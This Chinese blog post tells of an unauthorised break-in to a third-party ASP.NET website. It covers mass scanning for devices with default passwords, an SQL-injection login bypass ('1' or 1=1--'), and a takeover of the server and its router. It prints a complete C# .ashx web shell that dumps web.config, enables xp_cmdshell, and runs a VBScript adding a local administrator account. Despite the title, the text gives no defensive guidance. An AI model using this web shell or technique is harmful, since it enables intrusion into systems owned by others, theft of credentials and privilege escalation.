记一次ASP.NET网站的入侵和如何避免被入侵

2019-04-08 10:02:39来源：中国.NET研究协会阅读 ()

首先我要申明的是不是什么语言写出来的程序就不安全，而是得看写代码的人如何去写这个程序。

前些日子我去客户那调研，发现客户的监控系统用的是海康威视的硬盘录像机，然后默认用户名是amdin 密码是12345,回来后就想玩一玩看看有多少人用的是默认密码，于是就写了个扫描程序，很快扫描到了一大批网站，也得到很多采用的是默认用户名和密码。

玩了一两天后发现没什么好玩的，就随便在里面找找扫描记录，看到一些后台登陆地址，于是就都测试下，然后就发现了这个网站：

最开始我是测试弱口令：

admin amdin 等，随便测试了几个，没成功，于是开始测试sql的防注入，用户名输入 1' or 1=1-- 密码随便输了个1 登陆，居然登陆成功了……

但发现登陆进来后报错了！！！想了下可能是用户名的问题，于是就找页面看看能不能看到我的登陆用户名，最后找到写邮件里面看到了

当然如果入侵只到这你肯定会绝对弱爆了…… 其实当然也是，因为我拿下了他的数据和程序。当然最好拿下了他的服务器，得知他服务器是做的端口映射，于是又拿下了他的路由器，然后就没有再继续往下进行了，当然还可以继续下去，比如路由器的dns劫持，页面重定向，端口镜像等等

下面我开始介绍主要入侵页面，文件上传页面：

自己写了个ashx页面，上传

代码很简单，就是读取网站的web.config文件然后以文本形式输出，

我先简单说下入侵流程：

1、读取web.config得到数据库连接

2、利用SQL Server执行命令添加Windows用户（因为网站默认是iis用户，没有权限直线net等相关操作，但SQL Server是基于本地服务运行的，权限很高）

我贴出我上传的ashx文件代码：

<%@ WebHandler Language="C#" Class="TextLd" %>

using System;

using System.Collections.Generic;

using System.Linq;

using System.Web;

using System.Data.SqlClient;

    public class TextLd : IHttpHandler

    {

        public void CreateLocalUser(string newPath)

        {

            System.Diagnostics.Process.Start(@"d:\1.vbs");

            System.IO.File.WriteAllText(@"d:\1.vbs", "set wsnetwork=CreateObject(\"WSCRIPT.NETWORK\") \r\n os=\"WinNT://\"&wsnetwork.ComputerName \r\n Set ob=GetObject(os) \r\nSet oe=GetObject(os&\"/Administrators,group\") '属性,admin组\r\nod=ob.Create(\"user\",\"test\") '建立用户 \r\nSetPassword \"1234\" '设置密码 \r\nSetInfo\r\nof=GetObject(os&\"/test\",user)\r\n add os&\"/test\"");

        }

        public void ShowWebConfig(HttpContext context)

        {

            context.Response.Write(System.IO.File.ReadAllText(context.Request.MapPath("~/web.config")));

        }

        public void WriteVbs(HttpContext context)

        {

            System.IO.File.WriteAllText(context.Request.MapPath("~/1.vbs"), "set wsnetwork=CreateObject(\"WSCRIPT.NETWORK\") \r\n os=\"WinNT://\"&wsnetwork.ComputerName \r\n Set ob=GetObject(os) \r\nSet oe=GetObject(os&\"/Administrators,group\") '属性,admin组\r\nod=ob.Create(\"user\",\"test\") '建立用户 \r\nSetPassword \"1234\" '设置密码 \r\nSetInfo\r\nof=GetObject(os&\"/test\",user)\r\n add os&\"/test\"");

        }

        public void ExecuteSql(string connection, string sql)

        {

            using (SqlConnection con = new SqlConnection(connection))

            {

                using (SqlCommand commd = new SqlCommand(sql, con))

                {

                    con.Open();

                    commd.ExecuteNonQuery();

                    con.Close();

                }

            }

        }

        public void ProcessRequest(HttpContext context)

        {

            context.Response.ContentType = "text/plain";

            context.Response.Write(System.IO.File.ReadAllText(context.Request.MapPath("~/web.config")));

            try

            {

                var connection = context.Request.QueryString["connection"];

                switch (context.Request.QueryString["method"])

                {

                    case "1": WriteVbs(context); break;

                    case "2":

                        ExecuteSql(connection,@"sp_configure 'show advanced options',1  reconfigure");

                        ExecuteSql(connection,@"sp_configure 'xp_cmdshell',1 reconfigure");//开启数据库的xp_cmdshell

                        break;

                    case "3": ExecuteSql(connection, "exec master..xp_cmdshell 'cscript " + context.Request.MapPath("~/1.vbs") + "'");

                        break;

                    default:

                        ShowWebConfig(context);

                        break;

                }

            }

            catch (Exception ex)

            {

                context.Response.Write(ex.Message);

            }

            context.Response.End();

        }

        public bool IsReusable

        {

            get

            {

                return false;

            }

        }

    }